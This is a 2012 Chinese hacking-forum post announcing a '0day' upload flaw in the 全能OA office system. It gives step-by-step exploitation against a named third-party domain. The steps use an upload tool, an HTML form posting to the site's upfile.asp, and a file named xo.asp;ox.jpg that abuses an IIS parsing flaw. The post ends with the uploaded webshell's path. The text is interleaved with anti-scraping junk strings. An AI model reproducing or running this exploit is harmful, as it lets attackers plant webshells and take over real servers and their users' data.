找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2275|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
: j# h! y7 r4 y( [4 T
6 t, c1 P9 M+ P0 y+ J系统介绍:0 s* I, V/ {$ f' ~& A9 v6 I2 ~
+ o1 H5 v# `$ O' m  U8 P2 Z' @% u* J
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。- \8 D5 n- ?5 l6 ^/ Y3 l6 I+ V
% A$ i" [7 D5 @# E' Q# J' \
主要功能:
3 c7 c  c: W& b/ S公司通告 , Q, s0 ]. Z& _
工作计划
2 V2 J! s& ^4 O$ U! r通讯助理
1 {! y* Z6 U8 q客户资源 / Z( `2 `# y" s* |3 B6 X' G* _
我的公文
2 i2 p; O9 B& Z  r# u公文传阅 $ k# B3 ~+ I9 o' r
公共资源
1 L7 D9 B4 f0 _) F资源预约 4 f. k8 D9 |8 u
今日考勤
* @: X( I7 d5 `/ w  e个人计划 : B9 Y6 _' q6 a- K
个人通讯录
5 c) U7 ]. @$ F' P- G$ C" O个人基本档案
& r9 b( B  d* {# g未读邮件
' n% t6 L  P) f$ S7 Y" m发邮件 * R9 |- \9 ~% [( F$ g
收件夹 & q) n  C! H5 F$ v' x, q
寄件夹
  P2 X* s# Y) q1 v0 h1 j8 L- N网络硬盘 , |+ p1 h; h: X% P+ ]
网络会议
5 T1 E" w* j% j+ k0 ^4 b2 D网络调查
- B- K/ i( H% C$ P  P  p6 K) J交流论坛
* b$ u2 f. V. K1 s; H6 Y% J3 K( q3 Y: d- D. C; `* B9 d
有兴趣测试的朋友可以下源码看看
4 {' m) l% z, v% V, f5 L2 K& e3 o- M6 J# f) M$ N/ o3 F# g" k) u1 R8 r
源码下载:& W) v1 Y0 l& E) H% Y
: C$ O3 D* k" R( w: q
http://www.mycodes.net/30/4750.htm
- Q6 x9 f# H; L+ Q
* T3 K+ s' V% K" `& J5 j' x, {0 Z漏洞介绍:
7 H9 [  e( y( A2 |
# D0 z8 f& I$ K由upfile.asp上传文件漏洞引起. q( l9 C- {- s! y) J' q
5 A( O3 ~0 `. V
测试方法:1 x: }+ M! ^% ?9 N

) c0 _8 L9 `/ J" g0 r" j. X使用名小子上传http://www.itlynn.com/upfile.asp即可
* S/ L* t3 ?' X$ F! J5 P3 ~! ^
如果upfile.asp文件被删除不存在。0 [* I9 Z" d$ K8 L- t3 v% w& s! u7 [

, p& `0 ?5 w0 v5 N$ x7 m' P  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp: i0 D) |1 r; J, ^* P1 Y3 O/ k
( a0 s; R, E5 V" Y
如果存在那么将如下代码保存为upfile.html。' d  r- b( G$ z) v" s# W

+ F/ j6 |- p9 g* c0 x+ o$ {然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
- t# e( a2 p" [. ?% m
+ d  j& c0 d, q. T' W
5 k0 |, Y, {: f& ]- f) T+ j& g
, [5 C( k( Z) p# \4 q& z% a01 <table border='0' align="center" cellpadding="5">
# u$ x2 i  X; O+ s( b* k: H" k, F( e& U
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
' X0 U, _$ M' ]( X: z8 L- C" N4 Q0 F, g
03 <tr> 3 W! Y! q& z* H1 A5 ~# j! x' _* D+ v

: A. y6 C# K% i4 P0 ]04             <td>报错:</td>
& [, k8 d# j) s! B- `) U1 L6 }/ a& ~6 K2 m6 M4 U
05             <td><input type='radio' name='errnumber' value='0'> 4 a/ m) E2 ^6 _8 _: |6 {& v$ b4 x# q

8 k) F2 D- C9 s9 i1 j* e+ |) ^06               自动更名 4 G5 `1 r- ?3 e6 U

& M. l) ^4 p+ f0 `. r07               <input type='radio' name='errnumber' value='1' checked>
4 c( d0 Z- R" z, e0 }; \( W9 {! ~: @5 {  a1 p0 e
08               报错方式 0 l1 d, J& K% Q1 g- i% u' p
! z) s  I  ]2 r2 P
09               <input type='radio' name='errnumber' value='2'>
: |  R3 s# |! U9 `. l8 S! a
! @0 I: x+ k8 R) L, x1 E" Q10               直接覆盖</td> ; o% B1 `/ e# g5 P

5 z3 P5 b: q$ v! n- d/ U& q9 E5 _11           </tr>
% _7 B% K+ m7 Q3 K/ S# x
: U+ H0 @8 [" K! ]3 @12           <tr> 7 w) a/ t  g8 P% z

. p2 O' A5 n  F6 w4 U. A13             <td>主题:</td>
; l# t# [! D1 a8 h+ v3 N' x- L& x0 ^0 v
14             <td><input type='text' name='filename' size='30'></td> 4 z9 @6 {1 i$ h' R. v* Y

/ U7 W2 G' b$ K8 l' \) q+ J7 c& f4 P15           </tr> / R8 G5 t1 G# t6 S8 X  v  ?

% e. [* f+ l- v' U" k2 Q16           <tr>
; J/ @. e/ q6 d% d0 R; ?) Z8 J. G
/ Y; Y$ P' z' G" z17             <td>文件:</td> 8 G& e6 i: ]& ]9 u. \5 z4 [
6 u; T' e2 }8 q' E2 ]
18             <td><input type="file"name="fruit"size="30"></td> ( r, F+ e! Z& w

( K, z  f) J1 j19           </tr>
" `4 t- F3 x. t" E) `4 O6 p% @/ C% E8 {( e3 o" A; W
20           <tr> : a- Q6 e. e2 O# e2 f0 J

! a9 ~! I, n; b$ L21             <td valign='top'>简介:</td>   L6 D, _4 K7 U5 T
  b& F8 d  J8 w4 _7 T, X
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ; u) ]# I! x) G7 a
  s* p1 m  {. K, Y9 q3 j# O/ Z
23           </tr> 6 s5 V" o* b6 u# Z
! R& [% ^9 Q/ t0 t8 [( G
24   
. L* `, I7 @1 I- E4 x$ Z' F8 f* S3 p& Y6 p1 k2 ?
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ! b% n( D6 o' Y7 h% @" `6 ^: ?% P  o# G
) a3 s' o! V# G4 V! p4 ?' u0 F
26           </tr>
) s  e" c$ i. H5 ?* x; O2 @
# i# w; D; v/ l27         </form>
. d/ w3 e- D9 c! x! E" q* d# G, K+ Y. |
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
" _  b" p( K) R9 G0 K
2 d% u* \% k2 `0 }: z 4 t/ L, \+ X( r( b5 k* q5 L5 O' q

, {8 m5 o) \( W+ h( p' @上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
7 D: q; T& h4 v  M3 p3 `1 O% J- j8 r& l6 A1 z2 O% l( ]2 `
此漏洞需要配合解析漏洞利用。
! G/ \3 n7 R! m8 r1 M5 ]" W' j: W! y" h5 O& \1 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表